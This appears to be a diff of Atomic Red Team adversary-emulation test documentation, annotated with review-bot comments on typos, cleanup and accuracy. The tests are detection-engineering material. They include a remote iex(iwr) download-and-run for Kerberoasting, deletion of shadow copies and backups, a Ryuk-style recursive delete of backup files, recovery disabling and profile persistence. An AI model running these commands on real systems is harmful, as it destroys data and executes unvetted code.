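Review bot: moving `sdbinst.exe -u #{file_path}` out of the attack commands into a Cleanup block is the right fix, since previously the test uninstalled its own shim immediately after installing it and left nothing for a detection to see. Worth stating in the description that the shim now persists until cleanup is run.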
@ -73,6 +73,8 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
<br/>
## Atomic Test #2 - New shim database files created in the default shim database directory
Upon execution, check the "C:\Windows\apppatch\Custom\" folder for the new shim database
https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html
**Supported Platforms:** Windows
@ -103,6 +105,9 @@ Remove-Item C:\Windows\apppatch\Custom\Custom64\T1138CompatDatabase.sdb -ErrorAc
<br/>
## Atomic Test #3 - Registry key creation and/or modification events for SDB
Create registry keys in locations where fin7 typically places SDB patches. Upon execution, output will be displayed describing
the registry keys that were created. These keys can also be viewed using the Registry Editor.
https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html
**Supported Platforms:** Windows

View File

@ -94,58 +94,92 @@ xattr -lr * / 2>&1 /dev/null | grep -C 2 "00 00 00 00 00 00 00 00 40 00 FF FF FF
<br/>
## Atomic Test #3 - Create Windows System File with Attrib
Creates a file and marks it as a system file using the attrib.exe utility.
Creates a file and marks it as a system file using the attrib.exe utility. Upon execution, open the file in file explorer then open Properties > Details
and observe that the Attributes are "SA" for System and Archive.
**Supported Platforms:** Windows
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_to_modify | File to modify using Attrib command | string | %temp%&#92;T1158.txt|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
echo T1158 > %TEMP%\T1158.txt
attrib.exe +s %TEMP%\T1158.txt
attrib.exe +s #{file_to_modify}
```
#### Cleanup Commands:
```cmd
del /A:S %TEMP%\T1158.txt >nul 2>&1
del /A:S #{file_to_modify} >nul 2>&1
```
#### Dependencies: Run with `command_prompt`!
##### Description: The file must exist on disk at specified location (#{file_to_modify})
##### Check Prereq Commands:
```cmd
IF EXIST #{file_to_modify} ( EXIT 0 ) ELSE ( EXIT 1 )
```
##### Get Prereq Commands:
```cmd
echo system_Attrib_T1158 >> #{file_to_modify}
```
<br/>
<br/>
## Atomic Test #4 - Create Windows Hidden File with Attrib
Creates a file and marks it as hidden using the attrib.exe utility.
Creates a file and marks it as hidden using the attrib.exe utility.Upon execution, open File Epxplorer and enable View > Hidden Items. Then, open Properties > Details on the file
and observe that the Attributes are "SH" for System and Hidden.
**Supported Platforms:** Windows
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_to_modify | File to modify using Attrib command | string | %temp%&#92;T1158.txt|
#### Attack Commands: Run with `command_prompt`!
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
echo T1158_hidden > %TEMP%\T1158_hidden.txt
attrib.exe +h %TEMP%\T1158_hidden.txt
attrib.exe +h #{file_to_modify}
```
#### Cleanup Commands:
```cmd
del /A:H %TEMP%\T1158_hidden.txt >nul 2>&1
del /A:H #{file_to_modify} >nul 2>&1
```
#### Dependencies: Run with `command_prompt`!
##### Description: The file must exist on disk at specified location (#{file_to_modify})
##### Check Prereq Commands:
```cmd
IF EXIST #{file_to_modify} ( EXIT 0 ) ELSE ( EXIT 1 )
```
##### Get Prereq Commands:
```cmd
echo system_Attrib_T1158 >> #{file_to_modify}
```
<br/>
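Review bot: Test #4's new description claims the Attributes will show "SH" (System and Hidden), but its attack command only runs `attrib.exe +h`; the System bit is present only if Test #3 was run first on the same file, and both tests now share the default `%temp%\T1158.txt`. Either describe the result as Hidden (plus Archive on a newly created file) or set `+s +h` explicitly. The "Elevation Required" tag added to Test #4 is also unnecessary: setting the hidden attribute on a file in the user's own %temp% needs no admin rights. Typos: "utility.Upon" is missing a space, and "Epxplorer" should be "Explorer".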
@ -238,7 +272,8 @@ defaults write com.apple.finder AppleShowAllFiles NO
<br/>
## Atomic Test #8 - Create ADS command prompt
Create an Alternate Data Stream with the command prompt. Write access is required.
Create an Alternate Data Stream with the command prompt. Write access is required. Upon execution, run "dir /a-d /s /r | find ":$DATA"" in the %temp%
folder to view that the alternate data stream exists. To view the data in the alternate data stream, run "notepad T1158_has_ads.txt:adstest.txt"
**Supported Platforms:** Windows
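Review bot: the verification step in the new description names the file `T1158_has_ads.txt`, but the default `file_name` input in this same test is changed below to `%temp%\T1158_has_ads_cmd.txt`, so `notepad T1158_has_ads.txt:adstest.txt` as written will not open the stream. Use the actual default name in the description.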
@ -248,7 +283,7 @@ Create an Alternate Data Stream with the command prompt. Write access is require
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_name | File name of file to create ADS on. | string | test.txt|
| file_name | File name of file to create ADS on. | string | %temp%&#92;T1158_has_ads_cmd.txt|
| ads_filename | Name of ADS file. | string | adstest.txt|
@ -256,7 +291,6 @@ Create an Alternate Data Stream with the command prompt. Write access is require
```cmd
echo "Normal Text." > #{file_name}
echo cmd /c echo "Shell code execution."> #{file_name}:#{ads_filename}
for /f "usebackq delims=φ" %i in (#{file_name}:#{ads_filename}) do %i
```
@ -268,13 +302,26 @@ del #{file_name} >nul 2>&1
#### Dependencies: Run with `command_prompt`!
##### Description: The file must exist on disk at specified location (#{file_name})
##### Check Prereq Commands:
```cmd
IF EXIST #{file_name} ( EXIT 0 ) ELSE ( EXIT 1 )
```
##### Get Prereq Commands:
```cmd
echo normal_text >> #{file_name} >nul 2>&1
```
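Review bot: in the Get Prereq command `echo normal_text >> #{file_name} >nul 2>&1`, the later `>nul` takes over stdout, so `normal_text` goes to nul and the file is only created empty. The check command only needs the file to exist, so this still passes, but the command should do what it says: drop the `>nul 2>&1`.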
<br/>
<br/>
## Atomic Test #9 - Create ADS PowerShell
Create an Alternate Data Stream with PowerShell. Write access is required.
Create an Alternate Data Stream with PowerShell. Write access is required. To verify execution, the the command "ls -Recurse | %{ gi $_.Fullname -stream *} | where stream -ne ':$Data' | Select-Object pschildname"
in the %temp% direcotry to view all files with hidden data streams. To view the data in the alternate data stream, run "notepad.exe T1158_has_ads_powershell.txt:adstest.txt" in the %temp% folder.
**Supported Platforms:** Windows
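Review bot: typos in the new description: "the the command" (and the verb is missing: "run the command"), and "direcotry" should be "directory".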
@ -284,7 +331,7 @@ Create an Alternate Data Stream with PowerShell. Write access is required.
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_name | File name of file to create ADS on. | string | test.txt|
| file_name | File name of file to create ADS on. | string | $env:TEMP&#92;T1158_has_ads_powershell.txt|
| ads_filename | Name of ADS file. | string | adstest.txt|
@ -295,7 +342,6 @@ Create an Alternate Data Stream with PowerShell. Write access is required.
echo "test" > #{file_name} | set-content -path test.txt -stream #{ads_filename} -value "test"
set-content -path #{file_name} -stream #{ads_filename} -value "test2"
set-content -path . -stream #{ads_filename} -value "test3"
ls -Recurse | %{ gi $_.Fullname -stream *} | where stream -ne ':$Data' | Select-Object pschildname
```
#### Cleanup Commands:
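Review bot: the first attack line still pipes `echo "test" > #{file_name}` into `set-content -path test.txt -stream #{ads_filename}`, which writes the stream onto a hard-coded `test.txt` in the current directory rather than onto `#{file_name}`, and `set-content -path . -stream #{ads_filename} -value "test3"` attaches a stream to the current directory itself. The cleanup `Remove-Item -Path #{file_name}` removes neither. Either drop the two stray lines or extend the cleanup with `Remove-Item -Path test.txt -ErrorAction Ignore` and `Remove-Item -Path . -Stream #{ads_filename} -ErrorAction Ignore`.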
@ -305,6 +351,18 @@ Remove-Item -Path #{file_name} -ErrorAction Ignore
#### Dependencies: Run with `powershell`!
##### Description: The file must exist on disk at specified location (#{file_name})
##### Check Prereq Commands:
```powershell
if (Test-Path #{file_name}) { exit 0 } else { exit 1 }
```
##### Get Prereq Commands:
```powershell
New-Item -Path #{file_name} | Out-Null
```
<br/>

View File

@ -21,6 +21,8 @@ This test uses the Powershell Empire Module: https://github.com/EmpireProject/Em
The following are further sources and credits for this attack:
[Kerberoasting Without Mimikatz source] (https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/)
[Invoke-Kerberoast source] (https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/)
when executed successfully , the test displays available services with their hashes.
If the testing domain doesn't have any service principal name configured, there is no output
**Supported Platforms:** Windows
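Review bot: formatting in the added lines: "successfully ," has a stray space before the comma, "when" should start with a capital, and the second sentence needs a terminating period.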
@ -32,7 +34,7 @@ The following are further sources and credits for this attack:
```powershell
Import-Module .\Invoke-Kerberoast.ps1
iex(iwr https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1)
Invoke-Kerberoast | fl
```
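Review bot: replacing `Import-Module .\Invoke-Kerberoast.ps1` with `iex(iwr https://raw.githubusercontent.com/EmpireProject/Empire/master/...)` makes the test download and execute an unpinned script from the `master` branch at run time, so its behaviour can change without any edit here and it fails offline. Other tests in this commit fetch their files in a Get Prereq block with `Invoke-WebRequest ... -OutFile` and then run the local copy; do the same here and pin the URL to a specific commit rather than `master`.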

View File

@ -232,6 +232,8 @@ msiexec.exe /q /i "#{msi_payload}"
## Atomic Test #6 - Msiexec.exe - Execute Arbitrary DLL
Execute arbitrary DLL file stored locally. Commonly seen in application installation.
Upon execution, a window titled "Boom!" will open that says "Locked and Loaded!". For 32 bit systems change the dll_payload argument to the Win32 folder.
By default, if the src folder is not in place, it will download the 64 bit version.
**Supported Platforms:** Windows
@ -241,7 +243,7 @@ Execute arbitrary DLL file stored locally. Commonly seen in application installa
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| dll_payload | DLL to execute | Path | PathToAtomicsFolder&#92;T1218&#92;src&#92;Win32&#92;T1218-2.dll|
| dll_payload | DLL to execute | Path | PathToAtomicsFolder&#92;T1218&#92;src&#92;x64&#92;T1218.dll|
#### Attack Commands: Run with `command_prompt`!
@ -255,7 +257,7 @@ msiexec.exe /y "#{dll_payload}"
#### Dependencies: Run with `powershell`!
##### Description: T1218-2.dll must exist on disk at specified location (#{dll_payload})
##### Description: T1218.dll must exist on disk at specified location (#{dll_payload})
##### Check Prereq Commands:
```powershell
if (Test-Path #{dll_payload}) {exit 0} else {exit 1}
@ -263,7 +265,7 @@ if (Test-Path #{dll_payload}) {exit 0} else {exit 1}
##### Get Prereq Commands:
```powershell
New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Win32/T1218-2.dll" -OutFile "#{dll_payload}"
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/x64/T1218.dll" -OutFile "#{dll_payload}"
```
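Review bot: the Get Prereq command hard-codes the x64 download URL (`.../src/x64/T1218.dll`) while the new description tells 32-bit users to point `dll_payload` at the Win32 folder; with that override the prereq still writes the 64-bit DLL into the Win32 path and `msiexec.exe /y` will fail to load it. Derive the URL from the architecture (or from the `dll_payload` path) instead of hard-coding x64.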

View File

@ -31,7 +31,7 @@ Command-line examples:(Citation: XSL Bypass Mar 2019)(Citation: LOLBAS Wmic)
<br/>
## Atomic Test #1 - MSXSL Bypass using local files
Executes the code specified within a XSL script tag during XSL transformation using a local payload. Requires download of MSXSL from Microsoft at https://www.microsoft.com/en-us/download/details.aspx?id=21714.
Executes the code specified within a XSL script tag during XSL transformation using a local payload. Requires download of MSXSL from Microsoft at https://www.microsoft.com/en-us/download/details.aspx?id=21714. Open Calculator.exe when test sucessfully executed, while AV turned off.
**Supported Platforms:** Windows
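Review bot: "Open Calculator.exe when test sucessfully executed, while AV turned off." should read "Upon successful execution, calc.exe will be launched." ("sucessfully" is misspelled), matching the phrasing used in the other descriptions in this commit; rather than telling the reader to turn AV off, note that antivirus blocking the payload is a possible and expected outcome. The same sentence is added to Test #2 and Test #4 below.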
@ -84,7 +84,7 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
<br/>
## Atomic Test #2 - MSXSL Bypass using remote files
Executes the code specified within a XSL script tag during XSL transformation using a remote payload. Requires download of MSXSL from Microsoft at https://www.microsoft.com/en-us/download/details.aspx?id=21714.
Executes the code specified within a XSL script tag during XSL transformation using a remote payload. Requires download of MSXSL from Microsoft at https://www.microsoft.com/en-us/download/details.aspx?id=21714. Open Calculator.exe when test sucessfully executed, while AV turned off.
**Supported Platforms:** Windows
@ -132,7 +132,7 @@ Executes the code specified within a XSL script using a local payload.
```cmd
wmic.exe #{wmic_command} /FORMAT:#{local_xsl_file}
wmic #{wmic_command} /FORMAT:"#{local_xsl_file}"
```
@ -157,7 +157,7 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
<br/>
## Atomic Test #4 - WMIC bypass using remote XSL file
Executes the code specified within a XSL script using a remote payload.
Executes the code specified within a XSL script using a remote payload. Open Calculator.exe when test sucessfully executed, while AV turned off.
**Supported Platforms:** Windows
@ -175,7 +175,7 @@ Executes the code specified within a XSL script using a remote payload.
```cmd
wmic.exe #{wmic_command} /FORMAT:#{remote_xsl_file}
wmic #{wmic_command} /FORMAT:"#{remote_xsl_file}"
```

View File

@ -8,103 +8,16 @@ To maximize impact on the target organization in operations where network-wide a
## Atomic Tests
- [Atomic Test #1 - Windows - Delete Volume Shadow Copies](#atomic-test-1---windows---delete-volume-shadow-copies)
- [Atomic Test #1 - Windows - Overwrite file with Sysinternals SDelete](#atomic-test-1---windows---overwrite-file-with-sysinternals-sdelete)
- [Atomic Test #2 - Windows - Delete Windows Backup Catalog](#atomic-test-2---windows---delete-windows-backup-catalog)
- [Atomic Test #3 - Windows - Disable Windows Recovery Console Repair](#atomic-test-3---windows---disable-windows-recovery-console-repair)
- [Atomic Test #4 - Windows - Overwrite file with Sysinternals SDelete](#atomic-test-4---windows---overwrite-file-with-sysinternals-sdelete)
- [Atomic Test #5 - macOS/Linux - Overwrite file with DD](#atomic-test-5---macoslinux---overwrite-file-with-dd)
- [Atomic Test #6 - Windows - Delete Backup Files](#atomic-test-6---windows---delete-backup-files)
- [Atomic Test #2 - macOS/Linux - Overwrite file with DD](#atomic-test-2---macoslinux---overwrite-file-with-dd)
<br/>
## Atomic Test #1 - Windows - Delete Volume Shadow Copies
Deletes Windows Volume Shadow Copies. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer.
**Supported Platforms:** Windows
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
vssadmin.exe delete shadows /all /quiet
```
<br/>
<br/>
## Atomic Test #2 - Windows - Delete Windows Backup Catalog
Deletes Windows Backup Catalog. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer.
**Supported Platforms:** Windows
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
wbadmin.exe delete catalog -quiet
```
<br/>
<br/>
## Atomic Test #3 - Windows - Disable Windows Recovery Console Repair
Disables repair by the Windows Recovery Console on boot.
This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer.
**Supported Platforms:** Windows
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
bcdedit.exe /set {default} recoveryenabled no
```
#### Cleanup Commands:
```cmd
bcdedit.exe /set {default} bootstatuspolicy DisplayAllFailures
bcdedit.exe /set {default} recoveryenabled yes
```
<br/>
<br/>
## Atomic Test #4 - Windows - Overwrite file with Sysinternals SDelete
Overwrites and deletes a file using Sysinternals SDelete.
Requires the download of either Sysinternals Suite or the individual SDelete utility.
## Atomic Test #1 - Windows - Overwrite file with Sysinternals SDelete
Overwrites and deletes a file using Sysinternals SDelete. Upon successful execution, "Files deleted: 1" will be displayed in
the powershell session along with other information about the file that was deleted.
**Supported Platforms:** Windows
@ -114,15 +27,15 @@ Requires the download of either Sysinternals Suite or the individual SDelete uti
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| sdelete_exe | Path of sdelete executable | Path | PathToAtomicsFolder&#92;T1485&#92;bin&#92;sdelete.exe|
| sdelete_exe | Path of sdelete executable | Path | $env:TEMP&#92;Sdelete&#92;sdelete.exe|
| file_to_delete | Path of file to delete | path | $env:TEMP&#92;T1485.txt|
#### Attack Commands: Run with `powershell`!
```powershell
New-Item $env:TEMP\T1485.txt
#{sdelete_exe} -accepteula $env:TEMP\T1485.txt
Invoke-Expression -Command "#{sdelete_exe} -accepteula #{file_to_delete}"
```
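Review bot: `Invoke-Expression -Command "#{sdelete_exe} -accepteula #{file_to_delete}"` builds a command string from two inputs and evaluates it; it breaks on paths containing spaces and is exactly the Invoke-Expression-over-interpolated-input pattern that PowerShell detection content flags, which muddies what this test is meant to exercise. The call operator does the job without string evaluation: `& "#{sdelete_exe}" -accepteula "#{file_to_delete}"`.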
@ -132,14 +45,22 @@ New-Item $env:TEMP\T1485.txt
##### Description: Secure delete tool from Sysinternals must exist on disk at specified location (#{sdelete_exe})
##### Check Prereq Commands:
```powershell
if (Test-Path #{sdelete_exe}) {0} else {1}
if (Test-Path #{sdelete_exe}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
Invoke-WebRequest "https://download.sysinternals.com/files/SDelete.zip" -OutFile "$env:TEMP\SDelete.zip"
Expand-Archive $env:TEMP\SDelete.zip $env:TEMP\Sdelete -Force
New-Item -ItemType Directory (Split-Path "#{sdelete_exe}") -Force | Out-Null
Copy-Item $env:TEMP\Sdelete\sdelete.exe "#{sdelete_exe}" -Force
Remove-Item $env:TEMP\SDelete.zip -Force
```
##### Description: The file to delete must exist at #{file_to_delete}
##### Check Prereq Commands:
```powershell
if (Test-Path #{file_to_delete}) { exit 0 } else { exit 1 }
```
##### Get Prereq Commands:
```powershell
New-Item #{file_to_delete} -Force | Out-Null
```
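Review bot: the Get Prereq block downloads SDelete.zip with no integrity check and then runs the extracted binary with the operator's rights; at minimum verify the signature with `Get-AuthenticodeSignature` on the extracted sdelete.exe, or compare a `Get-FileHash` SHA256 against a known value. Also, with the new default `sdelete_exe` of `$env:TEMP\Sdelete\sdelete.exe`, the `Copy-Item $env:TEMP\Sdelete\sdelete.exe "#{sdelete_exe}"` line copies the file onto itself and only does work when the input is overridden; a comment saying so would help.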
@ -148,7 +69,7 @@ Copy-Item $env:TEMP\Sdelete\sdelete.exe "#{sdelete_exe}" -Force
<br/>
<br/>
## Atomic Test #5 - macOS/Linux - Overwrite file with DD
## Atomic Test #2 - macOS/Linux - Overwrite file with DD
Overwrites and deletes a file using DD.
To stop the test, break the command with CTRL/CMD+C.
@ -176,28 +97,4 @@ dd of=#{file_to_overwrite} if=#{overwrite_source}
<br/>
<br/>
## Atomic Test #6 - Windows - Delete Backup Files
Deletes backup files in a manner similar to Ryuk ransomware.
**Supported Platforms:** Windows
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\backup*.* c:\*.set c:\*.win c:\*.dsk >nul 2>&1
```
<br/>

View File

@ -16,7 +16,9 @@ Adversaries may accomplish this by disabling individual services of high importa
<br/>
## Atomic Test #1 - Windows - Stop service using Service Controller
Stops a specified service using the sc.exe command.
Stops a specified service using the sc.exe command. Upon execution, if the spooler service was running infomration will be displayed saying
it has changed to a state of STOP_PENDING. If the spooler service was not running "The service has not been started." will be displayed and it can be
started by running the cleanup command.
**Supported Platforms:** Windows
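Review bot: typo "infomration" in the new description, and the sentence runs on; a comma after "running" ("if the spooler service was running, information will be displayed ...") fixes it.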
@ -49,7 +51,9 @@ sc.exe start #{service_name}
<br/>
## Atomic Test #2 - Windows - Stop service using net.exe
Stops a specified service using the net.exe command.
Stops a specified service using the net.exe command. Upon execution, if the service was running "The Print Spooler service was stopped successfully."
will be displayed. If the service was not running, "The Print Spooler service is not started." will be displayed and it can be
started by running the cleanup command.
**Supported Platforms:** Windows
@ -82,8 +86,10 @@ net.exe start #{service_name}
<br/>
## Atomic Test #3 - Windows - Stop service by killing process
Stops a specified service killng the service's process.
This technique was used by WannaCry.
Stops a specified service killng the service's process.
This technique was used by WannaCry. Upon execution, if the spoolsv service was running "SUCCESS: The process "spoolsv.exe" with PID 2316 has been terminated."
will be displayed. If the service was not running "ERROR: The process "spoolsv.exe" not found." will be displayed and it can be
started by running the cleanup command.
**Supported Platforms:** Windows
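Review bot: the quoted success message hard-codes "PID 2316", which is only the PID observed on the author's machine; phrase it as "PID <n>" so readers do not expect that number. "killng" should be "killing" (it is carried from the old line into the new one, so fix it while the line is being rewritten).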

View File

@ -21,11 +21,18 @@ A number of native Windows utilities have been used by adversaries to disable or
- [Atomic Test #5 - Windows - Delete Volume Shadow Copies via WMI with PowerShell](#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell)
- [Atomic Test #6 - Windows - Delete Backup Files](#atomic-test-6---windows---delete-backup-files)
<br/>
## Atomic Test #1 - Windows - Delete Volume Shadow Copies
Deletes Windows Volume Shadow Copies. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer.
Deletes Windows Volume Shadow Copies. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer. Upon
execution, if no shadow volumes exist the message "No items found that satisfy the query." will be displayed. If shadow volumes are present, it
will delete them without printing output to the screen. This is because the /quiet parameter was passed which also suppresses the y/n
confirmation prompt. Shadow copies can only be created on Windows server or Windows 8.
https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/cc788055(v=ws.11)
**Supported Platforms:** Windows
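Review bot: "Shadow copies can only be created on Windows server or Windows 8" is imprecise. What is limited is the `vssadmin create shadow` command used in the prereq (client editions' vssadmin does not offer it); client Windows still creates shadow copies through System Restore and other VSS requesters, and the linked page is the Windows Server 2012 vssadmin reference. Rephrase as "the `vssadmin create shadow` prereq only works on Windows Server (or Windows 8)".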
@ -43,6 +50,18 @@ vssadmin.exe delete shadows /all /quiet
#### Dependencies: Run with `powershell`!
##### Description: Create volume shadow copy of C:\ . This prereq command only works on Windows Server or Windows 8.
##### Check Prereq Commands:
```powershell
if(!(vssadmin.exe list shadows | findstr "No items found that satisfy the query.")) { exit 0 } else { exit 1 }
```
##### Get Prereq Commands:
```powershell
vssadmin.exe create shadow /for=c:
```
<br/>
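Review bot: the Check Prereq command `findstr "No items found that satisfy the query."` without `/C:` treats each space-separated word as a separate search string, so it matches any `vssadmin list shadows` output line containing "No", "the", "that", etc. (the attribute line of an existing shadow copy contains "No auto release"), and the leading `!` then reports "no shadow copy exists" even when one does. Use `findstr /C:"No items found that satisfy the query."`, and check `$LASTEXITCODE` rather than relying on the pipeline's truthiness.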
@ -50,6 +69,7 @@ vssadmin.exe delete shadows /all /quiet
## Atomic Test #2 - Windows - Delete Volume Shadow Copies via WMI
Deletes Windows Volume Shadow Copies via WMI. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer.
Shadow copies can only be created on Windows server or Windows 8.
**Supported Platforms:** Windows
@ -73,7 +93,8 @@ wmic.exe shadowcopy delete
<br/>
## Atomic Test #3 - Windows - Delete Windows Backup Catalog
Deletes Windows Backup Catalog. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer.
Deletes Windows Backup Catalog. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer. Upon execution,
"The backup catalog has been successfully deleted." will be displayed in the PowerShell session.
**Supported Platforms:** Windows
@ -97,8 +118,8 @@ wbadmin.exe delete catalog -quiet
<br/>
## Atomic Test #4 - Windows - Disable Windows Recovery Console Repair
Disables repair by the Windows Recovery Console on boot.
This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer.
Disables repair by the Windows Recovery Console on boot. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer.
Upon execution, "The operation completed successfully." will be displayed in the powershell session.
**Supported Platforms:** Windows
@ -114,6 +135,11 @@ bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
bcdedit.exe /set {default} recoveryenabled no
```
#### Cleanup Commands:
```cmd
bcdedit.exe /set {default} bootstatuspolicy DisplayAllFailures
bcdedit.exe /set {default} recoveryenabled yes
```
@ -123,9 +149,35 @@ bcdedit.exe /set {default} recoveryenabled no
<br/>
## Atomic Test #5 - Windows - Delete Volume Shadow Copies via WMI with PowerShell
Deletes Windows Volume Shadow Copies with PowerShell code and Get-WMIObject.
Deletes Windows Volume Shadow Copies with PowerShell code and Get-WMIObject.
This technique is used by numerous ransomware families such as Sodinokibi/REvil.
Executes Get-WMIObject
Executes Get-WMIObject. Shadow copies can only be created on Windows server or Windows 8, so upon execution
there may be no output displayed.
**Supported Platforms:** Windows
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}
```
<br/>
<br/>
## Atomic Test #6 - Windows - Delete Backup Files
Deletes backup files in a manner similar to Ryuk ransomware. Upon exection, many "access is denied" messages will appear as the commands try
to delete files from around the system.
**Supported Platforms:** Windows
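Review bot: typo "exection" in the new Test #6 description. For Test #5, "there may be no output displayed" is accurate, but the `Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}` loop silently removes every shadow copy on the host; the description should say so, as Test #1 now does for the `/quiet` switch.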
@ -137,7 +189,7 @@ Executes Get-WMIObject
```cmd
powershell.exe -Command "Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}"
del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\backup*.* c:\*.set c:\*.win c:\*.dsk
```
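Review bot: removing `>nul 2>&1` from the Ryuk-style `del /s /f /q c:\*.VHD c:\*.bac c:\*.bak ...` line makes the "access is denied" output described above visible, but the command is not scoped to test artifacts: it recursively deletes any genuine `.bak`, `.VHD`, `Backup*` and similar files on C:. The description should state that this test destroys real backup files and must only run on a disposable host, and an explicit "no cleanup possible" note would make that unmistakable.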

View File

@ -15,6 +15,9 @@ Explicitly assigning the PPID may also enable [Privilege Escalation](https://att
## Atomic Test #1 - Parent PID Spoofing using PowerShell
This test uses PowerShell to replicates how Cobalt Strike does ppid spoofing and masquerade a spawned process.
Upon execution, "Process C:\Program Files\Internet Explorer\iexplore.exe is spawned with pid ####" will be displayed and
calc.exe will be launched.
Credit to In Ming Loh (https://github.com/countercept/ppid-spoofing/blob/master/PPID-Spoof.ps1)
**Supported Platforms:** Windows
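Review bot: grammar in the description line kept as context: "uses PowerShell to replicates how Cobalt Strike does ppid spoofing and masquerade" should read "uses PowerShell to replicate how Cobalt Strike does PPID spoofing and masquerades a spawned process".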

View File

@ -14,7 +14,7 @@ An adversary may also be able to escalate privileges if a script in a PowerShell
<br/>
## Atomic Test #1 - Append malicious start-process cmdlet
Appends a start process cmdlet to the current user's powershell profile pofile that points to a malicious executable
Appends a start process cmdlet to the current user's powershell profile pofile that points to a malicious executable. Upon execution, calc.exe will be launched.
**Supported Platforms:** Windows
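Review bot: "profile pofile" (a doubled, misspelled word) is carried over from the old line into the new one; fix it while the line is being rewritten.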
@ -32,14 +32,9 @@ Appends a start process cmdlet to the current user's powershell profile pofile t
```powershell
if(Test-Path #{ps_profile}){
}
else{
New-Item -Path #{ps_profile} -Type File -Force
}
$malicious = "Start-Process #{exe_path}"
Add-Content #{ps_profile} -Value $malicious
powershell -command exit
Add-Content #{ps_profile} -Value ""
Add-Content #{ps_profile} -Value "Start-Process #{exe_path}"
powershell -Command exit
```
#### Cleanup Commands:
@ -50,6 +45,18 @@ Set-Content $profile -Value $oldprofile
#### Dependencies: Run with `powershell`!
##### Description: Ensure a powershell profile exists for the current user
##### Check Prereq Commands:
```powershell
if (Test-Path #{ps_profile}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
New-Item -Path #{ps_profile} -Type File -Force
```
<br/>
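Review bot: the cleanup line shown in the hunk context, `Set-Content $profile -Value $oldprofile`, restores `$profile`, whereas the attack commands and the new Get Prereq block write to `#{ps_profile}`; if that input is overridden, cleanup rewrites the wrong file and the appended `Start-Process #{exe_path}` line survives in the real profile. Use `#{ps_profile}` consistently in the cleanup as well.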

View File

@ -12,7 +12,8 @@
<br/>
## Atomic Test #1 - Find and Display Internet Explorer Browser Version
Adversaries may attempt to get a listing of non-security related software that is installed on the system. Adversaries may use the information from Software Discovery during automated discovery to shape follow-on behaviors
Query the registry to determine the version of internet explorer installed on the system.
Upon execution, version information about internet explorer will be displayed.
**Supported Platforms:** Windows
@ -36,7 +37,8 @@ reg query "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer" /v svcVersio
<br/>
## Atomic Test #2 - Applications Installed
Adversaries may attempt to get a listing of all software that is installed on the system. Adversaries may use the information from Software Discovery during automated discovery to shape follow-on behaviors
Query the registry to determine software and versions installed on the system. Upon execution a table of
software name and version information will be displayed.
**Supported Platforms:** Windows

View File

@ -14,7 +14,8 @@ Adversaries may also subsequently log off and/or reboot boxes to set malicious c
<br/>
## Atomic Test #1 - Change User Password - Windows
Changes the user password to hinder access attempts. Seen in use by LockerGoga.
Changes the user password to hinder access attempts. Seen in use by LockerGoga. Upon execution, log into the user account "AtomicAdministrator" with
the password "HuHuHUHoHo283283".
**Supported Platforms:** Windows
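Review bot: the added verification sentence hardcodes "AtomicAdministrator" and "HuHuHUHoHo283283", which read like the default values of `#{user_account}` and `#{new_user_password}` (both visible in the next hunk's header, `net user #{user_account} #{new_user_password} /add`); if a runner overrides either input the instruction is wrong. Phrase it in terms of the inputs, or state that these are the defaults.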
@ -61,7 +62,7 @@ net user #{user_account} #{new_user_password} /add
<br/>
## Atomic Test #2 - Delete User - Windows
Deletes a user account to prevent access.
Deletes a user account to prevent access. Upon execution, run the command "net user" to verify that the new "AtomicUser" account was deleted.
**Supported Platforms:** Windows
